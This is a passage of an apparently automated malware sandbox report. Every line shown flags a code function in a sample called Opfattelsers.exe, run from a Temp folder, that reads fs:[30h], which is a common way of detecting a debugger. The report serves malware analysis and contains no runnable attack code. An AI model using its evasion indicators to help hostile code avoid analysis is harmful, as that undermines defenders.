            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F799D96 mov ecx, dword ptr fs:[00000030h]6_2_1F799D96
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F859D70 mov eax, dword ptr fs:[00000030h]6_2_1F859D70
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F859D70 mov eax, dword ptr fs:[00000030h]6_2_1F859D70
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79FD80 mov eax, dword ptr fs:[00000030h]6_2_1F79FD80
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84FD78 mov eax, dword ptr fs:[00000030h]6_2_1F84FD78
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84FD78 mov eax, dword ptr fs:[00000030h]6_2_1F84FD78
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84FD78 mov eax, dword ptr fs:[00000030h]6_2_1F84FD78
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84FD78 mov eax, dword ptr fs:[00000030h]6_2_1F84FD78
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84FD78 mov eax, dword ptr fs:[00000030h]6_2_1F84FD78
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7D1C7C mov eax, dword ptr fs:[00000030h]6_2_1F7D1C7C
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B1C60 mov eax, dword ptr fs:[00000030h]6_2_1F7B1C60
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85FCAB mov eax, dword ptr fs:[00000030h]6_2_1F85FCAB
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85FCAB mov eax, dword ptr fs:[00000030h]6_2_1F85FCAB
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85FCAB mov eax, dword ptr fs:[00000030h]6_2_1F85FCAB
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85FCAB mov eax, dword ptr fs:[00000030h]6_2_1F85FCAB
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85FCAB mov eax, dword ptr fs:[00000030h]6_2_1F85FCAB
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85FCAB mov eax, dword ptr fs:[00000030h]6_2_1F85FCAB
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85FCAB mov eax, dword ptr fs:[00000030h]6_2_1F85FCAB
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85FCAB mov eax, dword ptr fs:[00000030h]6_2_1F85FCAB
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85FCAB mov eax, dword ptr fs:[00000030h]6_2_1F85FCAB
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85FCAB mov eax, dword ptr fs:[00000030h]6_2_1F85FCAB
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85FCAB mov eax, dword ptr fs:[00000030h]6_2_1F85FCAB
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85FCAB mov eax, dword ptr fs:[00000030h]6_2_1F85FCAB
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85FCAB mov eax, dword ptr fs:[00000030h]6_2_1F85FCAB
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85FCAB mov eax, dword ptr fs:[00000030h]6_2_1F85FCAB
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F797C40 mov eax, dword ptr fs:[00000030h]6_2_1F797C40
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F797C40 mov ecx, dword ptr fs:[00000030h]6_2_1F797C40
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F797C40 mov eax, dword ptr fs:[00000030h]6_2_1F797C40
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F797C40 mov eax, dword ptr fs:[00000030h]6_2_1F797C40
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7DBC3B mov esi, dword ptr fs:[00000030h]6_2_1F7DBC3B
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F823CDB mov eax, dword ptr fs:[00000030h]6_2_1F823CDB
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F823CDB mov eax, dword ptr fs:[00000030h]6_2_1F823CDB
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F823CDB mov eax, dword ptr fs:[00000030h]6_2_1F823CDB
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84FCDF mov eax, dword ptr fs:[00000030h]6_2_1F84FCDF
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84FCDF mov eax, dword ptr fs:[00000030h]6_2_1F84FCDF
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84FCDF mov eax, dword ptr fs:[00000030h]6_2_1F84FCDF
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F841CF9 mov eax, dword ptr fs:[00000030h]6_2_1F841CF9
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F841CF9 mov eax, dword ptr fs:[00000030h]6_2_1F841CF9
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F841CF9 mov eax, dword ptr fs:[00000030h]6_2_1F841CF9
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F87BC01 mov eax, dword ptr fs:[00000030h]6_2_1F87BC01
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F87BC01 mov eax, dword ptr fs:[00000030h]6_2_1F87BC01
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F82BC10 mov eax, dword ptr fs:[00000030h]6_2_1F82BC10
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F82BC10 mov eax, dword ptr fs:[00000030h]6_2_1F82BC10
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F82BC10 mov ecx, dword ptr fs:[00000030h]6_2_1F82BC10
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F86DC27 mov eax, dword ptr fs:[00000030h]6_2_1F86DC27
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F86DC27 mov eax, dword ptr fs:[00000030h]6_2_1F86DC27
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F86DC27 mov eax, dword ptr fs:[00000030h]6_2_1F86DC27
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F797CD5 mov eax, dword ptr fs:[00000030h]6_2_1F797CD5
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F797CD5 mov eax, dword ptr fs:[00000030h]6_2_1F797CD5
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F797CD5 mov eax, dword ptr fs:[00000030h]6_2_1F797CD5
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F797CD5 mov eax, dword ptr fs:[00000030h]6_2_1F797CD5
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F797CD5 mov eax, dword ptr fs:[00000030h]6_2_1F797CD5
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F829C32 mov eax, dword ptr fs:[00000030h]6_2_1F829C32
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F871C3C mov eax, dword ptr fs:[00000030h]6_2_1F871C3C
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B1CC7 mov eax, dword ptr fs:[00000030h]6_2_1F7B1CC7
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B1CC7 mov eax, dword ptr fs:[00000030h]6_2_1F7B1CC7
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7D5CC0 mov eax, dword ptr fs:[00000030h]6_2_1F7D5CC0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7D5CC0 mov eax, dword ptr fs:[00000030h]6_2_1F7D5CC0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85FC4F mov eax, dword ptr fs:[00000030h]6_2_1F85FC4F
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79DCA0 mov eax, dword ptr fs:[00000030h]6_2_1F79DCA0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7CFCA0 mov ecx, dword ptr fs:[00000030h]6_2_1F7CFCA0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7CFCA0 mov eax, dword ptr fs:[00000030h]6_2_1F7CFCA0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7CFCA0 mov eax, dword ptr fs:[00000030h]6_2_1F7CFCA0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7CFCA0 mov eax, dword ptr fs:[00000030h]6_2_1F7CFCA0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7CFCA0 mov eax, dword ptr fs:[00000030h]6_2_1F7CFCA0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7DBCA0 mov eax, dword ptr fs:[00000030h]6_2_1F7DBCA0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7DBCA0 mov eax, dword ptr fs:[00000030h]6_2_1F7DBCA0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7DBCA0 mov ecx, dword ptr fs:[00000030h]6_2_1F7DBCA0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7DBCA0 mov eax, dword ptr fs:[00000030h]6_2_1F7DBCA0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A3C84 mov eax, dword ptr fs:[00000030h]6_2_1F7A3C84
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A3C84 mov eax, dword ptr fs:[00000030h]6_2_1F7A3C84
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A3C84 mov eax, dword ptr fs:[00000030h]6_2_1F7A3C84
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A3C84 mov eax, dword ptr fs:[00000030h]6_2_1F7A3C84
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F873B80 mov eax, dword ptr fs:[00000030h]6_2_1F873B80
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F873B80 mov eax, dword ptr fs:[00000030h]6_2_1F873B80
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F873B80 mov eax, dword ptr fs:[00000030h]6_2_1F873B80
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F869B8B mov eax, dword ptr fs:[00000030h]6_2_1F869B8B
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F869B8B mov eax, dword ptr fs:[00000030h]6_2_1F869B8B
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85FB97 mov eax, dword ptr fs:[00000030h]6_2_1F85FB97
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79FB4C mov edi, dword ptr fs:[00000030h]6_2_1F79FB4C
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7D9B28 mov eax, dword ptr fs:[00000030h]6_2_1F7D9B28
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7D9B28 mov eax, dword ptr fs:[00000030h]6_2_1F7D9B28
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F82FBDC mov eax, dword ptr fs:[00000030h]6_2_1F82FBDC
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F82FBDC mov eax, dword ptr fs:[00000030h]6_2_1F82FBDC
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F82FBDC mov eax, dword ptr fs:[00000030h]6_2_1F82FBDC
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85FBF3 mov eax, dword ptr fs:[00000030h]6_2_1F85FBF3
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A1B04 mov eax, dword ptr fs:[00000030h]6_2_1F7A1B04
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A1B04 mov eax, dword ptr fs:[00000030h]6_2_1F7A1B04
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85FB0C mov eax, dword ptr fs:[00000030h]6_2_1F85FB0C
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E1BEF mov eax, dword ptr fs:[00000030h]6_2_1F7E1BEF
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E1BEF mov eax, dword ptr fs:[00000030h]6_2_1F7E1BEF
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F873B10 mov eax, dword ptr fs:[00000030h]6_2_1F873B10
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B3BD6 mov eax, dword ptr fs:[00000030h]6_2_1F7B3BD6
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B3BD6 mov eax, dword ptr fs:[00000030h]6_2_1F7B3BD6
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B3BD6 mov eax, dword ptr fs:[00000030h]6_2_1F7B3BD6
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B3BD6 mov eax, dword ptr fs:[00000030h]6_2_1F7B3BD6
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B3BD6 mov eax, dword ptr fs:[00000030h]6_2_1F7B3BD6
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F797BCD mov eax, dword ptr fs:[00000030h]6_2_1F797BCD
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F797BCD mov ecx, dword ptr fs:[00000030h]6_2_1F797BCD
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A9BC4 mov eax, dword ptr fs:[00000030h]6_2_1F7A9BC4
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F835B50 mov eax, dword ptr fs:[00000030h]6_2_1F835B50
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F835B50 mov eax, dword ptr fs:[00000030h]6_2_1F835B50
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7CDBA0 mov eax, dword ptr fs:[00000030h]6_2_1F7CDBA0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7CDBA0 mov eax, dword ptr fs:[00000030h]6_2_1F7CDBA0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7CDBA0 mov eax, dword ptr fs:[00000030h]6_2_1F7CDBA0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7CDBA0 mov eax, dword ptr fs:[00000030h]6_2_1F7CDBA0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7CDBA0 mov eax, dword ptr fs:[00000030h]6_2_1F7CDBA0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7CDBA0 mov eax, dword ptr fs:[00000030h]6_2_1F7CDBA0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7D9B9F mov eax, dword ptr fs:[00000030h]6_2_1F7D9B9F
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7D9B9F mov eax, dword ptr fs:[00000030h]6_2_1F7D9B9F
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7D9B9F mov eax, dword ptr fs:[00000030h]6_2_1F7D9B9F
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F843B60 mov eax, dword ptr fs:[00000030h]6_2_1F843B60
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F843B60 mov eax, dword ptr fs:[00000030h]6_2_1F843B60
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F843B60 mov eax, dword ptr fs:[00000030h]6_2_1F843B60
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F843B60 mov eax, dword ptr fs:[00000030h]6_2_1F843B60
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F843B60 mov eax, dword ptr fs:[00000030h]6_2_1F843B60
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85FA87 mov eax, dword ptr fs:[00000030h]6_2_1F85FA87
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F851AA3 mov eax, dword ptr fs:[00000030h]6_2_1F851AA3
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F851AA3 mov eax, dword ptr fs:[00000030h]6_2_1F851AA3
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F851AA3 mov eax, dword ptr fs:[00000030h]6_2_1F851AA3
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84DAAC mov ecx, dword ptr fs:[00000030h]6_2_1F84DAAC
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84DAAC mov ecx, dword ptr fs:[00000030h]6_2_1F84DAAC
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84DAAC mov eax, dword ptr fs:[00000030h]6_2_1F84DAAC
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F799A40 mov ecx, dword ptr fs:[00000030h]6_2_1F799A40
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F821ACB mov eax, dword ptr fs:[00000030h]6_2_1F821ACB
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F821ACB mov ecx, dword ptr fs:[00000030h]6_2_1F821ACB
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7ABA30 mov eax, dword ptr fs:[00000030h]6_2_1F7ABA30
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7ABA30 mov ecx, dword ptr fs:[00000030h]6_2_1F7ABA30
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7ABA30 mov eax, dword ptr fs:[00000030h]6_2_1F7ABA30
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7ABA30 mov eax, dword ptr fs:[00000030h]6_2_1F7ABA30
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7ABA30 mov eax, dword ptr fs:[00000030h]6_2_1F7ABA30
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7ABA30 mov eax, dword ptr fs:[00000030h]6_2_1F7ABA30
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F835AD0 mov eax, dword ptr fs:[00000030h]6_2_1F835AD0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7CDA20 mov eax, dword ptr fs:[00000030h]6_2_1F7CDA20
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7CDA20 mov eax, dword ptr fs:[00000030h]6_2_1F7CDA20
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7C9A18 mov ecx, dword ptr fs:[00000030h]6_2_1F7C9A18
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79BA10 mov eax, dword ptr fs:[00000030h]6_2_1F79BA10
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7D5A01 mov eax, dword ptr fs:[00000030h]6_2_1F7D5A01
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7D5A01 mov ecx, dword ptr fs:[00000030h]6_2_1F7D5A01
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7D5A01 mov eax, dword ptr fs:[00000030h]6_2_1F7D5A01
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7D5A01 mov eax, dword ptr fs:[00000030h]6_2_1F7D5A01
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85FA02 mov eax, dword ptr fs:[00000030h]6_2_1F85FA02
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84BA0B mov eax, dword ptr fs:[00000030h]6_2_1F84BA0B
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84BA0B mov eax, dword ptr fs:[00000030h]6_2_1F84BA0B
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84BA0B mov eax, dword ptr fs:[00000030h]6_2_1F84BA0B
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84BA0B mov eax, dword ptr fs:[00000030h]6_2_1F84BA0B
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F847A11 mov edi, dword ptr fs:[00000030h]6_2_1F847A11
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79BAE0 mov eax, dword ptr fs:[00000030h]6_2_1F79BAE0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F81DA1D mov eax, dword ptr fs:[00000030h]6_2_1F81DA1D
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7CBADA mov eax, dword ptr fs:[00000030h]6_2_1F7CBADA
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7CDAAE mov eax, dword ptr fs:[00000030h]6_2_1F7CDAAE
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7ABAA0 mov eax, dword ptr fs:[00000030h]6_2_1F7ABAA0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7ABAA0 mov eax, dword ptr fs:[00000030h]6_2_1F7ABAA0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79FAA4 mov ecx, dword ptr fs:[00000030h]6_2_1F79FAA4
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F797A80 mov eax, dword ptr fs:[00000030h]6_2_1F797A80
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F797A80 mov eax, dword ptr fs:[00000030h]6_2_1F797A80
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F797A80 mov eax, dword ptr fs:[00000030h]6_2_1F797A80
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F833A78 mov eax, dword ptr fs:[00000030h]6_2_1F833A78
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F833A78 mov eax, dword ptr fs:[00000030h]6_2_1F833A78
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F833A78 mov eax, dword ptr fs:[00000030h]6_2_1F833A78
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F833A78 mov eax, dword ptr fs:[00000030h]6_2_1F833A78
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F833A78 mov eax, dword ptr fs:[00000030h]6_2_1F833A78
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F833A78 mov eax, dword ptr fs:[00000030h]6_2_1F833A78
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F829983 mov eax, dword ptr fs:[00000030h]6_2_1F829983
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7CD978 mov eax, dword ptr fs:[00000030h]6_2_1F7CD978
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85598D mov eax, dword ptr fs:[00000030h]6_2_1F85598D
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85598D mov eax, dword ptr fs:[00000030h]6_2_1F85598D
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85598D mov eax, dword ptr fs:[00000030h]6_2_1F85598D
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7DB970 mov eax, dword ptr fs:[00000030h]6_2_1F7DB970
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7DB970 mov eax, dword ptr fs:[00000030h]6_2_1F7DB970
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7DB970 mov eax, dword ptr fs:[00000030h]6_2_1F7DB970
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7D196E mov eax, dword ptr fs:[00000030h]6_2_1F7D196E
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7D196E mov eax, dword ptr fs:[00000030h]6_2_1F7D196E
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7C7962 mov eax, dword ptr fs:[00000030h]6_2_1F7C7962
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F797967 mov eax, dword ptr fs:[00000030h]6_2_1F797967
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84F99B mov eax, dword ptr fs:[00000030h]6_2_1F84F99B
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84F99B mov eax, dword ptr fs:[00000030h]6_2_1F84F99B
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84F99B mov eax, dword ptr fs:[00000030h]6_2_1F84F99B
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84F99B mov eax, dword ptr fs:[00000030h]6_2_1F84F99B
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84F99B mov eax, dword ptr fs:[00000030h]6_2_1F84F99B
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84F99B mov eax, dword ptr fs:[00000030h]6_2_1F84F99B
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84F99B mov ecx, dword ptr fs:[00000030h]6_2_1F84F99B
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84F99B mov ecx, dword ptr fs:[00000030h]6_2_1F84F99B
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84F99B mov eax, dword ptr fs:[00000030h]6_2_1F84F99B
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84F99B mov eax, dword ptr fs:[00000030h]6_2_1F84F99B
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84F99B mov eax, dword ptr fs:[00000030h]6_2_1F84F99B
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84F99B mov eax, dword ptr fs:[00000030h]6_2_1F84F99B
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84F99B mov eax, dword ptr fs:[00000030h]6_2_1F84F99B
